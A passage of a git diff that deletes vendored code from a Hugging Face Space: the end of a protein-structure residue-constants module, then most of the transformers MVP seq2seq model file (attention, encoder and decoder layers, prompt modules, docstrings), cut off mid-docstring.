restype_rigid_group_default_frame[restype, 0, :, :] = np.eye(4) - - # pre-omega-frame to backbone (currently dummy identity matrix) - restype_rigid_group_default_frame[restype, 1, :, :] = np.eye(4) - - # phi-frame to backbone - mat = _make_rigid_transformation_4x4( - ex=atom_positions["N"] - atom_positions["CA"], - ey=np.array([1.0, 0.0, 0.0]), - translation=atom_positions["N"], - ) - restype_rigid_group_default_frame[restype, 2, :, :] = mat - - # psi-frame to backbone - mat = _make_rigid_transformation_4x4( - ex=atom_positions["C"] - atom_positions["CA"], - ey=atom_positions["CA"] - atom_positions["N"], - translation=atom_positions["C"], - ) - restype_rigid_group_default_frame[restype, 3, :, :] = mat - - # chi1-frame to backbone - if chi_angles_mask[restype][0]: - base_atom_names = chi_angles_atoms[resname][0] - base_atom_positions = [atom_positions[name] for name in base_atom_names] - mat = _make_rigid_transformation_4x4( - ex=base_atom_positions[2] - base_atom_positions[1], - ey=base_atom_positions[0] - base_atom_positions[1], - translation=base_atom_positions[2], - ) - restype_rigid_group_default_frame[restype, 4, :, :] = mat - - # chi2-frame to chi1-frame - # chi3-frame to chi2-frame - # chi4-frame to chi3-frame - # luckily all rotation axes for the next frame start at (0,0,0) of the - # previous frame - for chi_idx in range(1, 4): - if chi_angles_mask[restype][chi_idx]: 
- axis_end_atom_name = chi_angles_atoms[resname][chi_idx][2] - axis_end_atom_position = atom_positions[axis_end_atom_name] - mat = _make_rigid_transformation_4x4( - ex=axis_end_atom_position, - ey=np.array([-1.0, 0.0, 0.0]), - translation=axis_end_atom_position, - ) - restype_rigid_group_default_frame[restype, 4 + chi_idx, :, :] = mat - - -_make_rigid_group_constants() - - -def make_atom14_dists_bounds( - overlap_tolerance: float = 1.5, - bond_length_tolerance_factor: int = 15, -) -> Dict[str, np.ndarray]: - """compute upper and lower bounds for bonds to assess violations.""" - restype_atom14_bond_lower_bound = np.zeros([21, 14, 14], np.float32) - restype_atom14_bond_upper_bound = np.zeros([21, 14, 14], np.float32) - restype_atom14_bond_stddev = np.zeros([21, 14, 14], np.float32) - residue_bonds, residue_virtual_bonds, _ = load_stereo_chemical_props() - for restype, restype_letter in enumerate(restypes): - resname = restype_1to3[restype_letter] - atom_list = restype_name_to_atom14_names[resname] - - # create lower and upper bounds for clashes - for atom1_idx, atom1_name in enumerate(atom_list): - if not atom1_name: - continue - atom1_radius = van_der_waals_radius[atom1_name[0]] - for atom2_idx, atom2_name in enumerate(atom_list): - if (not atom2_name) or atom1_idx == atom2_idx: - continue - atom2_radius = van_der_waals_radius[atom2_name[0]] - lower = atom1_radius + atom2_radius - overlap_tolerance - upper = 1e10 - restype_atom14_bond_lower_bound[restype, atom1_idx, atom2_idx] = lower - restype_atom14_bond_lower_bound[restype, atom2_idx, atom1_idx] = lower - restype_atom14_bond_upper_bound[restype, atom1_idx, atom2_idx] = upper - restype_atom14_bond_upper_bound[restype, atom2_idx, atom1_idx] = upper - - # overwrite lower and upper bounds for bonds and angles - for b in residue_bonds[resname] + residue_virtual_bonds[resname]: - atom1_idx = atom_list.index(b.atom1_name) - atom2_idx = atom_list.index(b.atom2_name) - lower = b.length - bond_length_tolerance_factor * b.stddev - upper = b.length + bond_length_tolerance_factor * b.stddev - restype_atom14_bond_lower_bound[restype, atom1_idx, atom2_idx] = lower - restype_atom14_bond_lower_bound[restype, atom2_idx, atom1_idx] = lower - restype_atom14_bond_upper_bound[restype, atom1_idx, atom2_idx] = upper - restype_atom14_bond_upper_bound[restype, atom2_idx, atom1_idx] = upper - restype_atom14_bond_stddev[restype, atom1_idx, atom2_idx] = b.stddev - restype_atom14_bond_stddev[restype, atom2_idx, atom1_idx] = b.stddev - return { - "lower_bound": restype_atom14_bond_lower_bound, # shape (21,14,14) - "upper_bound": restype_atom14_bond_upper_bound, # shape (21,14,14) - "stddev": restype_atom14_bond_stddev, # shape (21,14,14) - } - - -restype_atom14_ambiguous_atoms = np.zeros((21, 14), dtype=np.float32) -restype_atom14_ambiguous_atoms_swap_idx: np.ndarray = np.tile(np.arange(14, dtype=int), (21, 1)) - - -def _make_atom14_ambiguity_feats() -> None: - for res, pairs in residue_atom_renaming_swaps.items(): - res_idx = restype_order[restype_3to1[res]] - for atom1, atom2 in pairs.items(): - atom1_idx = restype_name_to_atom14_names[res].index(atom1) - atom2_idx = restype_name_to_atom14_names[res].index(atom2) - restype_atom14_ambiguous_atoms[res_idx, atom1_idx] = 1 - restype_atom14_ambiguous_atoms[res_idx, atom2_idx] = 1 - restype_atom14_ambiguous_atoms_swap_idx[res_idx, atom1_idx] = atom2_idx - restype_atom14_ambiguous_atoms_swap_idx[res_idx, atom2_idx] = atom1_idx - - -_make_atom14_ambiguity_feats() - - -def aatype_to_str_sequence(aatype: Sequence[int]) -> 
str: - return "".join([restypes_with_x[aatype[i]] for i in range(len(aatype))]) diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/mvp/modeling_mvp.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/mvp/modeling_mvp.py deleted file mode 100644 index 21a82f95c333838fb648d79e5ef045e39335a411..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/mvp/modeling_mvp.py +++ /dev/null @@ -1,2073 +0,0 @@ -# coding=utf-8 -# Copyright 2022 The Fairseq Authors and The HuggingFace Inc. team. All rights reserved. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -""" PyTorch MVP model.""" -import copy -import math -from typing import List, Optional, Tuple, Union - -import torch -import torch.utils.checkpoint -from torch import nn -from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss - -from ...activations import ACT2FN -from ...modeling_outputs import ( - BaseModelOutput, - BaseModelOutputWithPastAndCrossAttentions, - CausalLMOutputWithCrossAttentions, - Seq2SeqLMOutput, - Seq2SeqModelOutput, - Seq2SeqQuestionAnsweringModelOutput, - Seq2SeqSequenceClassifierOutput, -) -from ...modeling_utils import PreTrainedModel -from ...utils import ( - add_code_sample_docstrings, - add_end_docstrings, - add_start_docstrings, - add_start_docstrings_to_model_forward, - logging, - replace_return_docstrings, -) -from .configuration_mvp import MvpConfig - - -logger = logging.get_logger(__name__) - -_CHECKPOINT_FOR_DOC = "RUCAIBox/mvp" -_CONFIG_FOR_DOC = "MvpConfig" - -# Base model docstring -_EXPECTED_OUTPUT_SHAPE = [1, 8, 1024] - -MVP_PRETRAINED_MODEL_ARCHIVE_LIST = [ - "RUCAIBox/mvp", - "RUCAIBox/mvp-data-to-text", - "RUCAIBox/mvp-open-dialog", - "RUCAIBox/mvp-question-answering", - "RUCAIBox/mvp-question-generation", - "RUCAIBox/mvp-story", - "RUCAIBox/mvp-summarization", - "RUCAIBox/mvp-task-dialog", - "RUCAIBox/mtl-data-to-text", - "RUCAIBox/mtl-multi-task", - "RUCAIBox/mtl-open-dialog", - "RUCAIBox/mtl-question-answering", - "RUCAIBox/mtl-question-generation", - "RUCAIBox/mtl-story", - "RUCAIBox/mtl-summarization", - # See all MVP models at https://huggingface.co/models?filter=mvp -] - - -# Copied from transformers.models.bart.modeling_bart.shift_tokens_right -def shift_tokens_right(input_ids: torch.Tensor, pad_token_id: int, decoder_start_token_id: int): - """ - Shift input ids one token to the right. 
- """ - shifted_input_ids = input_ids.new_zeros(input_ids.shape) - shifted_input_ids[:, 1:] = input_ids[:, :-1].clone() - shifted_input_ids[:, 0] = decoder_start_token_id - - if pad_token_id is None: - raise ValueError("self.model.config.pad_token_id has to be defined.") - # replace possible -100 values in labels by `pad_token_id` - shifted_input_ids.masked_fill_(shifted_input_ids == -100, pad_token_id) - - return shifted_input_ids - - -# Copied from transformers.models.bart.modeling_bart._make_causal_mask -def _make_causal_mask( - input_ids_shape: torch.Size, dtype: torch.dtype, device: torch.device, past_key_values_length: int = 0 -): - """ - Make causal mask used for bi-directional self-attention. - """ - bsz, tgt_len = input_ids_shape - mask = torch.full((tgt_len, tgt_len), torch.finfo(dtype).min, device=device) - mask_cond = torch.arange(mask.size(-1), device=device) - mask.masked_fill_(mask_cond < (mask_cond + 1).view(mask.size(-1), 1), 0) - mask = mask.to(dtype) - - if past_key_values_length > 0: - mask = torch.cat([torch.zeros(tgt_len, past_key_values_length, dtype=dtype, device=device), mask], dim=-1) - return mask[None, None, :, :].expand(bsz, 1, tgt_len, tgt_len + past_key_values_length) - - -# Copied from transformers.models.bart.modeling_bart._expand_mask -def _expand_mask(mask: torch.Tensor, dtype: torch.dtype, tgt_len: Optional[int] = None): - """ - Expands attention_mask from `[bsz, seq_len]` to `[bsz, 1, tgt_seq_len, src_seq_len]`. - """ - bsz, src_len = mask.size() - tgt_len = tgt_len if tgt_len is not None else src_len - - expanded_mask = mask[:, None, None, :].expand(bsz, 1, tgt_len, src_len).to(dtype) - - inverted_mask = 1.0 - expanded_mask - - return inverted_mask.masked_fill(inverted_mask.to(torch.bool), torch.finfo(dtype).min) - - -# Copied from transformers.models.bart.modeling_bart.BartLearnedPositionalEmbedding with Bart->MVP -class MvpLearnedPositionalEmbedding(nn.Embedding): - """ - This module learns positional embeddings up to a fixed maximum size. - """ - - def __init__(self, num_embeddings: int, embedding_dim: int): - # MVP is set up so that if padding_idx is specified then offset the embedding ids by 2 - # and adjust num_embeddings appropriately. Other models don't have this hack - self.offset = 2 - super().__init__(num_embeddings + self.offset, embedding_dim) - - def forward(self, input_ids: torch.Tensor, past_key_values_length: int = 0): - """`input_ids' shape is expected to be [bsz x seqlen].""" - - bsz, seq_len = input_ids.shape[:2] - positions = torch.arange( - past_key_values_length, past_key_values_length + seq_len, dtype=torch.long, device=self.weight.device - ).expand(bsz, -1) - - return super().forward(positions + self.offset) - - -class MvpAttention(nn.Module): - """Multi-headed attention from 'Attention Is All You Need' paper""" - - def __init__( - self, - embed_dim: int, - num_heads: int, - dropout: float = 0.0, - is_decoder: bool = False, - bias: bool = True, - ): - super().__init__() - self.embed_dim = embed_dim - self.num_heads = num_heads - self.dropout = dropout - self.head_dim = embed_dim // num_heads - - if (self.head_dim * num_heads) != self.embed_dim: - raise ValueError( - f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim}" - f" and `num_heads`: {num_heads})." 
- ) - self.scaling = self.head_dim**-0.5 - self.is_decoder = is_decoder - - self.k_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - self.v_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - self.q_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias) - - def _shape(self, tensor: torch.Tensor, seq_len: int, bsz: int): - return tensor.view(bsz, seq_len, self.num_heads, self.head_dim).transpose(1, 2).contiguous() - - def forward( - self, - hidden_states: torch.Tensor, - key_value_states: Optional[torch.Tensor] = None, - past_key_value: Optional[Tuple[torch.Tensor]] = None, - attention_mask: Optional[torch.Tensor] = None, - layer_head_mask: Optional[torch.Tensor] = None, - attn_prompt: Optional[torch.Tensor] = None, - output_attentions: bool = False, - ) -> Tuple[torch.Tensor, Optional[torch.Tensor], Optional[Tuple[torch.Tensor]]]: - """Input shape: Batch x Time x Channel""" - - # if key_value_states are provided this layer is used as a cross-attention layer - # for the decoder - is_cross_attention = key_value_states is not None - - bsz, tgt_len, _ = hidden_states.size() - - # get query proj - query_states = self.q_proj(hidden_states) * self.scaling - # get key, value proj - if is_cross_attention and past_key_value is not None: - # reuse k,v, cross_attentions - key_states = past_key_value[0] - value_states = past_key_value[1] - elif is_cross_attention: - # cross_attentions - key_states = self._shape(self.k_proj(key_value_states), -1, bsz) - value_states = self._shape(self.v_proj(key_value_states), -1, bsz) - elif past_key_value is not None: - # reuse k, v, self_attention - key_states = self._shape(self.k_proj(hidden_states), -1, bsz) - value_states = self._shape(self.v_proj(hidden_states), -1, bsz) - key_states = torch.cat([past_key_value[0], key_states], dim=2) - value_states = torch.cat([past_key_value[1], value_states], dim=2) - else: - # self_attention - key_states = self._shape(self.k_proj(hidden_states), -1, bsz) - value_states = self._shape(self.v_proj(hidden_states), -1, bsz) - - if self.is_decoder: - # if cross_attention save Tuple(torch.Tensor, torch.Tensor) of all cross attention key/value_states. - # Further calls to cross_attention layer can then reuse all cross-attention - # key/value_states (first "if" case) - # if uni-directional self-attention (decoder) save Tuple(torch.Tensor, torch.Tensor) of - # all previous decoder key/value_states. 
Further calls to uni-directional self-attention - # can concat previous decoder key/value_states to current projected key/value_states (third "elif" case) - # if encoder bi-directional self-attention `past_key_value` is always `None` - past_key_value = (key_states, value_states) - - if attn_prompt is not None: - key_states = torch.cat([attn_prompt[0].expand(bsz, -1, -1, -1), key_states], dim=2) - value_states = torch.cat([attn_prompt[1].expand(bsz, -1, -1, -1), value_states], dim=2) - if attention_mask is not None: - prompt_mask = torch.zeros(bsz, 1, tgt_len, attn_prompt[0].size(1)).to(attention_mask.device) - attention_mask = torch.cat([prompt_mask, attention_mask], dim=(-1)) - - proj_shape = (bsz * self.num_heads, -1, self.head_dim) - query_states = self._shape(query_states, tgt_len, bsz).view(*proj_shape) - key_states = key_states.view(*proj_shape) - value_states = value_states.view(*proj_shape) - - src_len = key_states.size(1) - attn_weights = torch.bmm(query_states, key_states.transpose(1, 2)) - - if attn_weights.size() != (bsz * self.num_heads, tgt_len, src_len): - raise ValueError( - f"Attention weights should be of size {(bsz * self.num_heads, tgt_len, src_len)}, but is" - f" {attn_weights.size()}" - ) - - if attention_mask is not None: - if attention_mask.size() != (bsz, 1, tgt_len, src_len): - raise ValueError( - f"Attention mask should be of size {(bsz, 1, tgt_len, src_len)}, but is {attention_mask.size()}" - ) - attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) + attention_mask - attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len) - - attn_weights = nn.functional.softmax(attn_weights, dim=-1) - - if layer_head_mask is not None: - if layer_head_mask.size() != (self.num_heads,): - raise ValueError( - f"Head mask for a single layer should be of size {(self.num_heads,)}, but is" - f" {layer_head_mask.size()}" - ) - attn_weights = layer_head_mask.view(1, -1, 1, 1) * attn_weights.view(bsz, self.num_heads, tgt_len, src_len) - attn_weights = attn_weights.view(bsz * self.num_heads, tgt_len, src_len) - - if output_attentions: - # this operation is a bit awkward, but it's required to - # make sure that attn_weights keeps its gradient. - # In order to do so, attn_weights have to be reshaped - # twice and have to be reused in the following - attn_weights_reshaped = attn_weights.view(bsz, self.num_heads, tgt_len, src_len) - attn_weights = attn_weights_reshaped.view(bsz * self.num_heads, tgt_len, src_len) - else: - attn_weights_reshaped = None - - attn_probs = nn.functional.dropout(attn_weights, p=self.dropout, training=self.training) - - attn_output = torch.bmm(attn_probs, value_states) - - if attn_output.size() != (bsz * self.num_heads, tgt_len, self.head_dim): - raise ValueError( - f"`attn_output` should be of size {(bsz, self.num_heads, tgt_len, self.head_dim)}, but is" - f" {attn_output.size()}" - ) - - attn_output = attn_output.view(bsz, self.num_heads, tgt_len, self.head_dim) - attn_output = attn_output.transpose(1, 2) - - # Use the `embed_dim` from the config (stored in the class) rather than `hidden_state` because `attn_output` can be - # partitioned aross GPUs when using tensor-parallelism. 
- attn_output = attn_output.reshape(bsz, tgt_len, self.embed_dim) - - attn_output = self.out_proj(attn_output) - - return attn_output, attn_weights_reshaped, past_key_value - - -class MvpEncoderLayer(nn.Module): - def __init__(self, config: MvpConfig): - super().__init__() - self.embed_dim = config.d_model - self.self_attn = MvpAttention( - embed_dim=self.embed_dim, - num_heads=config.encoder_attention_heads, - dropout=config.attention_dropout, - ) - self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim) - self.dropout = config.dropout - self.activation_fn = ACT2FN[config.activation_function] - self.activation_dropout = config.activation_dropout - self.fc1 = nn.Linear(self.embed_dim, config.encoder_ffn_dim) - self.fc2 = nn.Linear(config.encoder_ffn_dim, self.embed_dim) - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - - def forward( - self, - hidden_states: torch.FloatTensor, - attention_mask: torch.FloatTensor, - layer_head_mask: torch.FloatTensor, - self_attn_prompt: torch.FloatTensor, - output_attentions: Optional[bool] = False, - ) -> Tuple[torch.FloatTensor, Optional[torch.FloatTensor]]: - """ - Args: - hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)` - attention_mask (`torch.FloatTensor`): attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size - `(encoder_attention_heads,)`. - self_attn_prompt (`torch.FloatTensor`): prompt of self attention of shape - `(2, encoder_attention_heads, pro_len, head_dim)`. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. 
- """ - residual = hidden_states - hidden_states, attn_weights, _ = self.self_attn( - hidden_states=hidden_states, - attention_mask=attention_mask, - layer_head_mask=layer_head_mask, - attn_prompt=self_attn_prompt, - output_attentions=output_attentions, - ) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.self_attn_layer_norm(hidden_states) - - residual = hidden_states - hidden_states = self.activation_fn(self.fc1(hidden_states)) - hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training) - hidden_states = self.fc2(hidden_states) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.final_layer_norm(hidden_states) - - if hidden_states.dtype == torch.float16 and ( - torch.isinf(hidden_states).any() or torch.isnan(hidden_states).any() - ): - clamp_value = torch.finfo(hidden_states.dtype).max - 1000 - hidden_states = torch.clamp(hidden_states, min=-clamp_value, max=clamp_value) - - outputs = (hidden_states,) - - if output_attentions: - outputs += (attn_weights,) - - return outputs - - -class MvpDecoderLayer(nn.Module): - def __init__(self, config: MvpConfig): - super().__init__() - self.embed_dim = config.d_model - - self.self_attn = MvpAttention( - embed_dim=self.embed_dim, - num_heads=config.decoder_attention_heads, - dropout=config.attention_dropout, - is_decoder=True, - ) - self.dropout = config.dropout - self.activation_fn = ACT2FN[config.activation_function] - self.activation_dropout = config.activation_dropout - - self.self_attn_layer_norm = nn.LayerNorm(self.embed_dim) - self.encoder_attn = MvpAttention( - self.embed_dim, - config.decoder_attention_heads, - dropout=config.attention_dropout, - is_decoder=True, - ) - self.encoder_attn_layer_norm = nn.LayerNorm(self.embed_dim) - self.fc1 = nn.Linear(self.embed_dim, config.decoder_ffn_dim) - self.fc2 = nn.Linear(config.decoder_ffn_dim, self.embed_dim) - self.final_layer_norm = nn.LayerNorm(self.embed_dim) - - def forward( - self, - hidden_states: torch.Tensor, - attention_mask: Optional[torch.Tensor] = None, - encoder_hidden_states: Optional[torch.Tensor] = None, - encoder_attention_mask: Optional[torch.Tensor] = None, - layer_head_mask: Optional[torch.Tensor] = None, - cross_attn_layer_head_mask: Optional[torch.Tensor] = None, - self_attn_prompt: Optional[torch.Tensor] = None, - cross_attn_prompt: Optional[torch.Tensor] = None, - past_key_value: Optional[Tuple[torch.Tensor]] = None, - output_attentions: Optional[bool] = False, - use_cache: Optional[bool] = True, - ) -> Tuple[torch.FloatTensor, Optional[Tuple[torch.FloatTensor, torch.FloatTensor]]]: - """ - Args: - hidden_states (`torch.FloatTensor`): input to the layer of shape `(batch, seq_len, embed_dim)` - attention_mask (`torch.FloatTensor`): attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - encoder_hidden_states (`torch.FloatTensor`): - cross attention input to the layer of shape `(batch, seq_len, embed_dim)` - encoder_attention_mask (`torch.FloatTensor`): encoder attention mask of size - `(batch, 1, tgt_len, src_len)` where padding elements are indicated by very large negative values. - layer_head_mask (`torch.FloatTensor`): mask for attention heads in a given layer of size - `(encoder_attention_heads,)`. 
- cross_attn_layer_head_mask (`torch.FloatTensor`): mask for cross-attention heads in a given layer of - size `(decoder_attention_heads,)`. - self_attn_prompt (`torch.FloatTensor`): prompt of self attention of shape - `(2, decoder_attention_heads, pro_len, head_dim)`. - cross_attn_prompt (`torch.FloatTensor`): prompt of cross attention of shape - `(2, decoder_attention_heads, pro_len, head_dim)`. - past_key_value (`Tuple(torch.FloatTensor)`): cached past key and value projection states - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - """ - residual = hidden_states - - # Self Attention - # decoder uni-directional self-attention cached key/values tuple is at positions 1,2 - self_attn_past_key_value = past_key_value[:2] if past_key_value is not None else None - # add present self-attn cache to positions 1,2 of present_key_value tuple - hidden_states, self_attn_weights, present_key_value = self.self_attn( - hidden_states=hidden_states, - past_key_value=self_attn_past_key_value, - attention_mask=attention_mask, - layer_head_mask=layer_head_mask, - attn_prompt=self_attn_prompt, - output_attentions=output_attentions, - ) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.self_attn_layer_norm(hidden_states) - - # Cross-Attention Block - cross_attn_present_key_value = None - cross_attn_weights = None - if encoder_hidden_states is not None: - residual = hidden_states - - # cross_attn cached key/values tuple is at positions 3,4 of present_key_value tuple - cross_attn_past_key_value = past_key_value[-2:] if past_key_value is not None else None - hidden_states, cross_attn_weights, cross_attn_present_key_value = self.encoder_attn( - hidden_states=hidden_states, - key_value_states=encoder_hidden_states, - attention_mask=encoder_attention_mask, - layer_head_mask=cross_attn_layer_head_mask, - attn_prompt=cross_attn_prompt, - past_key_value=cross_attn_past_key_value, - output_attentions=output_attentions, - ) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.encoder_attn_layer_norm(hidden_states) - - # add cross-attn to positions 3,4 of present_key_value tuple - present_key_value = present_key_value + cross_attn_present_key_value - - # Fully Connected - residual = hidden_states - hidden_states = self.activation_fn(self.fc1(hidden_states)) - hidden_states = nn.functional.dropout(hidden_states, p=self.activation_dropout, training=self.training) - hidden_states = self.fc2(hidden_states) - hidden_states = nn.functional.dropout(hidden_states, p=self.dropout, training=self.training) - hidden_states = residual + hidden_states - hidden_states = self.final_layer_norm(hidden_states) - - outputs = (hidden_states,) - - if output_attentions: - outputs += (self_attn_weights, cross_attn_weights) - - if use_cache: - outputs += (present_key_value,) - - return outputs - - -# Copied from transformers.models.bart.modeling_bart.BartClassificationHead with Bart->MVP -class MvpClassificationHead(nn.Module): - """Head for sentence-level classification tasks.""" - - def __init__( - self, - input_dim: int, - inner_dim: int, - num_classes: int, - pooler_dropout: float, - ): - super().__init__() - self.dense = nn.Linear(input_dim, inner_dim) - self.dropout = nn.Dropout(p=pooler_dropout) - 
self.out_proj = nn.Linear(inner_dim, num_classes) - - def forward(self, hidden_states: torch.Tensor) -> torch.Tensor: - hidden_states = self.dropout(hidden_states) - hidden_states = self.dense(hidden_states) - hidden_states = torch.tanh(hidden_states) - hidden_states = self.dropout(hidden_states) - hidden_states = self.out_proj(hidden_states) - return hidden_states - - -class MvpPrompt(nn.Module): - """Layer-wise prompt for encoder or decoder.""" - - def __init__(self, config, num_layers, num_heads): - super().__init__() - self.prompt_length = config.prompt_length - self.num_layers = num_layers - self.num_heads = num_heads - self.head_dim = config.d_model // num_heads - self.dropout = nn.Dropout(p=config.dropout) - self.prompt_embedding = nn.Embedding(config.prompt_length, config.d_model) - self.prompt_trans = nn.Sequential( - nn.Linear(config.d_model, config.prompt_mid_dim), - nn.GELU(), - nn.Linear(config.prompt_mid_dim, num_layers * 2 * config.d_model), - ) - - def forward(self, prompt_ids: torch.Tensor) -> Tuple[torch.Tensor]: - prompt = self.prompt_trans(self.prompt_embedding(prompt_ids)) - prompt = prompt.view(self.prompt_length, self.num_layers * 2, self.num_heads, self.head_dim) - prompt = self.dropout(prompt) - prompt = prompt.permute([1, 2, 0, 3]).split(2) - return prompt - - -class MvpPreTrainedModel(PreTrainedModel): - config_class = MvpConfig - base_model_prefix = "model" - supports_gradient_checkpointing = True - - def _init_weights(self, module): - std = self.config.init_std - if isinstance(module, nn.Linear): - module.weight.data.normal_(mean=0.0, std=std) - if module.bias is not None: - module.bias.data.zero_() - elif isinstance(module, nn.Embedding): - module.weight.data.normal_(mean=0.0, std=std) - if module.padding_idx is not None: - module.weight.data[module.padding_idx].zero_() - - def _set_gradient_checkpointing(self, module, value=False): - if isinstance(module, (MvpDecoder, MvpEncoder, MvpPrompt)): - module.gradient_checkpointing = value - - @property - def dummy_inputs(self): - pad_token = self.config.pad_token_id - input_ids = torch.tensor([[0, 6, 10, 4, 2], [0, 8, 12, 2, pad_token]], device=self.device) - dummy_inputs = { - "attention_mask": input_ids.ne(pad_token), - "input_ids": input_ids, - } - return dummy_inputs - - -MVP_START_DOCSTRING = r""" - This model inherits from [`PreTrainedModel`]. Check the superclass documentation for the generic methods the - library implements for all its model (such as downloading or saving, resizing the input embeddings, pruning heads - etc.) - - This model is also a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. - Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage - and behavior. - - Parameters: - config ([`MvpConfig`]): - Model configuration class with all the parameters of the model. Initializing with a config file does not - load the weights associated with the model, only the configuration. Check out the - [`~PreTrainedModel.from_pretrained`] method to load the model weights. -""" - -MVP_INPUTS_DOCSTRING = r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you provide - it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. 
- - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - decoder_input_ids (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*): - Indices of decoder input sequence tokens in the vocabulary. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are decoder input IDs?](../glossary#decoder-input-ids) - - Mvp uses the `eos_token_id` as the starting token for `decoder_input_ids` generation. If `past_key_values` - is used, optionally only the last `decoder_input_ids` have to be input (see `past_key_values`). - - For translation and summarization training, `decoder_input_ids` should be provided. If no - `decoder_input_ids` is provided, the model will create this tensor by shifting the `input_ids` to the right - for denoising pre-training following the paper. - decoder_attention_mask (`torch.LongTensor` of shape `(batch_size, target_sequence_length)`, *optional*): - Default behavior: generate a tensor that ignores pad tokens in `decoder_input_ids`. Causal mask will also - be used by default. - - If you want to change padding behavior, you should read [`modeling_mvp._prepare_decoder_attention_mask`] - and modify to your needs. See diagram 1 in [the paper](https://arxiv.org/abs/1910.13461) for more - information on the default strategy. - head_mask (`torch.Tensor` of shape `(encoder_layers, encoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules in the encoder. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - decoder_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules in the decoder. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the cross-attention modules in the decoder. Mask values selected in `[0, - 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - encoder_outputs (`tuple(tuple(torch.FloatTensor)`, *optional*): - Tuple consists of (`last_hidden_state`, *optional*: `hidden_states`, *optional*: `attentions`) - `last_hidden_state` of shape `(batch_size, sequence_length, hidden_size)`, *optional*) is a sequence of - hidden-states at the output of the last layer of the encoder. Used in the cross-attention of the decoder. - past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`): - Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of shape - `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of shape - `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. 
- - Contains pre-computed hidden-states (key and values in the self-attention blocks and in the cross-attention - blocks) that can be used (see `past_key_values` input) to speed up sequential decoding. - - If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those that - don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of all - `decoder_input_ids` of shape `(batch_size, sequence_length)`. inputs_embeds (`torch.FloatTensor` of shape - `(batch_size, sequence_length, hidden_size)`, *optional*): Optionally, instead of passing `input_ids` you - can choose to directly pass an embedded representation. This is useful if you want more control over how to - convert `input_ids` indices into associated vectors than the model's internal embedding lookup matrix. - decoder_inputs_embeds (`torch.FloatTensor` of shape `(batch_size, target_sequence_length, hidden_size)`, *optional*): - Optionally, instead of passing `decoder_input_ids` you can choose to directly pass an embedded - representation. If `past_key_values` is used, optionally only the last `decoder_inputs_embeds` have to be - input (see `past_key_values`). This is useful if you want more control over how to convert - `decoder_input_ids` indices into associated vectors than the model's internal embedding lookup matrix. - - If `decoder_input_ids` and `decoder_inputs_embeds` are both unset, `decoder_inputs_embeds` takes the value - of `inputs_embeds`. - use_cache (`bool`, *optional*): - If set to `True`, 